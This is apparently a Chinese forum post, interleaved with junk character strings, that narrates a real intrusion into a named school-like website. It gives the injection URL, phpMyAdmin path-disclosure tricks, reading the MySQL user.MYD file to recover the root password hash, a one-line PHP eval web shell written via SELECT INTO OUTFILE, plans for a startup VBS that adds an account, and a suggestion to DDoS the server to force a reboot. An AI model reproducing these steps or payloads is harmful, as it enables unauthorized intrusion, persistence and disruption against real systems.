第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
1 p0 H" o6 y% r& T" t) g/ u8 U发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!! y- p9 @. U4 e' l6 ~( `7 _
7 {0 C5 r& z1 K) P$ K5 H, X
5 [/ ]$ Q! O$ `
" [5 f1 e: X. ]' l/ C常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
! X3 o+ C R0 t% D1 J g/ r' {5 y, v
那么想可以直接写入shell ,getshell有几个条件:
3 T! `& w a. B! v; c! v+ j1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF ( T! O+ e+ m+ j! n2 U/ o
. h& s t4 _& C! {! B; M( _试着爆绝对路径: 1 E/ k2 q" n2 P# M
1./phpMyAdmin/index.php?lang[]=1
6 n4 t" v7 V) d2./phpMyAdmin/phpinfo.php 5 K6 d' |1 C" R
3./load_file() , j, x+ p( {# `9 @1 F0 }& h' K$ g
4./phpmyadmin/themes/darkblue_orange/layout.inc.php & K8 v+ R( B! g3 U
5./phpmyadmin/libraries/select_lang.lib.php + ~4 z) K$ G) M) _- @1 n( G
6./phpmyadmin/libraries/lect_lang.lib.php
7 D" s6 C- F E4 E' F7./phpmyadmin/libraries/mcrypt.lib.php D' r2 K1 n9 W0 E) f
8./phpmyadmin/libraries/export/xls.php
) j. Z( _& X0 K8 U N4 {# g* F5 ^$ h) Q$ ]3 Z. \) E8 j, ?
均不行...........................
$ I( ~3 k1 I0 c9 Y }5 v- B
1 |) n3 r% e/ X) }0 Z御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php , ]1 F, {+ D5 s& G
: F% F: K% Y% I( B9 X
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
( z- p+ l! Y5 { v5 K
* c' Q4 ?) Q/ J- _) i3 `默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
1 D8 ?2 K, k* d' [/ {) l0 n1 K0 R6 H; `3 f
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
. Y# z3 s& X8 T2 U: z4 z( g# `9 K: R# v6 f1 E4 _% [
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell # f" D4 z- C5 S& Y
" }' T% X7 P- ]& u+ U7 y, y0 l, `
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
' p- y+ m+ `/ a( `, n* N2 H. j. F. d& G
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
5 K: M: `% J4 z/ Z
( F S& D% o0 Q! D3 k' L- g' W成功读到root密码:
8 q" x: G# w6 n( x- W0 k
( Q% ^5 }$ A6 N3 E5 d# k- V17---- r(0072)
" ]# L* w7 f$ `. n) D18---- o(006f) 4 p* E2 |0 [! y
19---- o(006f)
5 H" o1 R m& h4 k' S( l7 }20---- t(0074)
7 U a0 d7 I- K5 J5 ^' T. w$ g8 F, R/ |21---- *(002a) ; y7 c4 Z* K" B, [# X
22---- 8(0038) ) `# m3 ?' m2 l
23---- 2(0032) 0 a2 a- l8 G, ? J/ ~( q" S* p) a
24---- E(0045)
- C1 L4 D, |* M, ^- G7 J% G25---- 1(0031) 1 `3 l0 H- s$ F1 e0 e
26---- C(0043)
$ P7 e9 P6 @) v! o27---- 5(0035)
0 M6 _0 d" `5 x9 M28---- 8(0038) 1 p. e/ l) ^+ W {$ \, A' M9 l L: G
29---- 2(0032)
% p: i7 d7 f8 w) H9 w# W' q. r30---- 8(0038)
4 {! @$ C# _7 g31---- A(0041) - B1 M0 t) i. F3 D. T6 o
32---- 9(0039)
m& E9 L; D+ V. G; k33---- B(0042)
! t/ I r) F1 {4 b6 h) z0 |' [34---- 5(0035)
$ f: t; _' _8 ]( K0 t3 K35---- 4(0034) " T6 R: n6 i8 _, [
36---- 8(0038) 7 x* L# M" v, @- w Z4 J" Z, J0 E
37---- 6(0036) , Q' |/ w$ N9 C1 H! r9 c
38---- 4(0034) 9 C/ {4 q' B0 p$ M8 n" h& w
39---- 9(0039) 5 |! m/ Q9 }. O" J
40---- 1(0031)
+ A* E6 F6 j+ a N0 M1 E41---- 1(0031)
. a( ^+ ]8 u S6 g! ?/ ^$ |42---- 5(0035) . w4 G$ G9 q8 f7 h! |2 [
43---- 3(0033) 4 L6 T. B1 P- T7 E( N
44---- 5(0035)
$ c% Z. G: i F$ F6 S8 }45---- 9(0039)
+ M4 `0 S+ H/ ~$ n46---- 8(0038)
6 P6 F' |$ N- d: z47---- F(0046) ; E7 ], @/ x0 A1 Y
48---- F(0046) 5 L- Y& Y& Y |
49---- 4(0034) ( N3 w2 g5 H( i5 X$ a
50---- F(0046)
) B2 \: W* ^ s6 E51---- 0(0030)
& p+ a3 z, t2 l3 S1 P52---- 3(0033)
7 V3 |! [+ z& h4 `* ]$ O( s53---- 2(0032) / G; C3 C) U9 F6 A, a( _, I
54---- A(0041)
# k- [- t) N4 n2 [- |: c55---- 4(0034) , A) @! e. Q) _ ?
56---- A(0041) 5 X+ W, D: l8 X; L
57---- B(0042)
: {/ j! M( D. @" O W58---- *(0044)
9 _7 `9 [2 b$ Q$ A! ]0 w" l+ u59---- *(0035)
, ^9 A' h9 y0 \9 {60---- *(0041)
4 L& {" {0 z, T [) s3 [/ w6 ] D61---- *0032)
/ x; l: L5 o- e9 z& _; u/ P- {5 R- `# \: x
解密后成功登陆phpmyamin
5 X6 Q# E' S. e: Y% j
% j+ e8 Y6 b* t9 e/ V0 I3 P2 {
/ q2 j6 i% h- w" a% h
7 Q5 J3 I5 Y; d2 D. [5 ?, I8 E% S. L9 G
" H* B/ N; X/ f! A u$ b找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
5 y" Q5 ] `1 L. _. W/ H: ?& p a) e' e2 E% T& _& e
成功执行,拿下shell,菜刀连接: ' Y4 }- y6 T+ l5 ]: ]
: i K) v) e. }5 a% Z1 n# p" [服务器不支持asp,aspx,php提权无果...................
4 H# F1 x# Q0 ]! D& \# D- @! _0 x9 L) G3 b+ I
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: 3 X' w4 h, z( o6 m) e
服务器上已经有个隐藏帐号了
) [# _" ^6 `( T6 h7 u别名 administrators
0 {$ q5 v5 s Z$ P+ o0 o& F注释 管理员对计算机/域有不受限制的完全访问权 ; E0 @# F6 D1 }
成员
7 q! J/ A$ K( Y3 [, ^- ^( P9 O# A-------------------------------------------------------------------------------5 o* Y# u6 L4 x
admin
5 T P3 S [- i3 dAdministrator
7 I6 w _7 a0 ^2 bslipper$
; `0 R# v7 C+ N$ H8 K" psqluser
. g& c- _7 T4 D7 L; N7 V- S命令成功完成。
/ N* C6 m/ M9 E: V1 A2 L1 E$ t+ f& g6 l; {% e$ w
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。+ g( l* h- k. D1 y- a/ O
% i& }& D- {, S
ddos服务器重启,不然就只能坐等服务器重启了...............................
( d3 }; V7 p. O/ I& u+ w. v
+ d$ i: D3 Y7 p& T } ( X b5 ^4 ?7 m0 B+ u
|